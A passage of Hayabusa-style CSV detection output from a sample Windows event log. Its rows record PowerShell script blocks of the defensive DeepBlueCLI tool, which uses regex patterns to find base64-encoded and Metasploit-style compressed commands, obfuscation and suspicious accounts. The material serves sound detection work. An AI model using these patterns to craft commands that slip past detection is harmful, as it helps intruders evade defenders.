{$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.139 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.428 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.428 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.429 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.430 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.522 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.524 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.525 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:49.697 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.700 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} 